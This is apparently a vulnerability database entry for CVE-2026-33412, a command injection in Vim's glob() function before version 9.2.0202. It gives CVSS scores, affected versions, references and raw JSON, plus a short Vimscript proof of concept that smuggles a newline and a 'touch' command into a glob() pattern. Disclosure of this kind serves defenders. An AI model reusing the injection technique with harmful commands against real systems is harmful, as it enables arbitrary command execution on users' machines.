Security Vulnerability Report
CVE-2026-33412 CVSS 5.6 MEDIUM

CVE-2026-33412

Published: 2026-03-24 20:16:30
Last Modified: 2026-03-25 21:59:15

Description

Vim is an open source, command line text editor. Prior to version 9.2.0202, a command injection vulnerability exists in Vim's glob() function on Unix-like systems. By including a newline character (\n) in a pattern passed to glob(), an attacker may be able to execute arbitrary shell commands. This vulnerability depends on the user's 'shell' setting. This issue has been patched in version 9.2.0202.

CVSS Details

CVSS Score
5.6
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:vim:vim:*:*:*:*:*:*:*:* - VULNERABLE
Vim < 9.2.0202

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
vim
" PoC for CVE-2026-33412 (Vim glob() Command Injection)
"
" Description: This script demonstrates how a newline character in the glob()
" pattern can lead to command execution on Unix-like systems.
"
" Usage: Open this file in a vulnerable Vim version (< 9.2.0202) and source it.

function! ExploitCVE()
  " The vulnerability is triggered by passing a newline character to glob().
  " The shell interprets the newline as a command separator.
  " Example: Create a file named 'pwned' via the touch command.
  let l:malicious_payload = "/tmp/*" . "\n" . "touch /tmp/vim_cve_pwned"

  " Calling glob() with the payload
  call glob(l:malicious_payload)

  echo "Check if /tmp/vim_cve_pwned exists."
endfunction

call ExploitCVE()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33412", "sourceIdentifier": "[email protected]", "published": "2026-03-24T20:16:29.740", "lastModified": "2026-03-25T21:59:14.980", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vim is an open source, command line text editor. Prior to version 9.2.0202, a command injection vulnerability exists in Vim's glob() function on Unix-like systems. By including a newline character (\\n) in a pattern passed to glob(), an attacker may be able to execute arbitrary shell commands. This vulnerability depends on the user's 'shell' setting. This issue has been patched in version 9.2.0202."}, {"lang": "es", "value": "Vim es un editor de texto de línea de comandos, de código abierto. Antes de la versión 9.2.0202, existe una vulnerabilidad de inyección de comandos en la función glob() de Vim en sistemas tipo Unix. Al incluir un carácter de nueva línea (\\n) en un patrón pasado a glob(), un atacante podría ejecutar comandos de shell arbitrarios. Esta vulnerabilidad depende de la configuración 'shell' del usuario. Este problema ha sido parcheado en la versión 9.2.0202."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:L/I:H/A:N", "baseScore": 5.6, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.3, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.3, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vim:vim:*:*:*:*:*:*:*:*", "versionEndExcluding": "9.2.0202", "matchCriteriaId": "E79E22DB-B3DB-45AC-9D86-F917E6A7EC6C"}]}]}], "references": [{"url": "https://github.com/vim/vim/commit/645ed6597d1ea896c712cd7ddbb6edee79577e9a", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/vim/vim/releases/tag/v9.2.0202", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/vim/vim/security/advisories/GHSA-w5jw-f54h-x46c", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/03/19/10", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Patch", "Third Party Advisory"]}]}}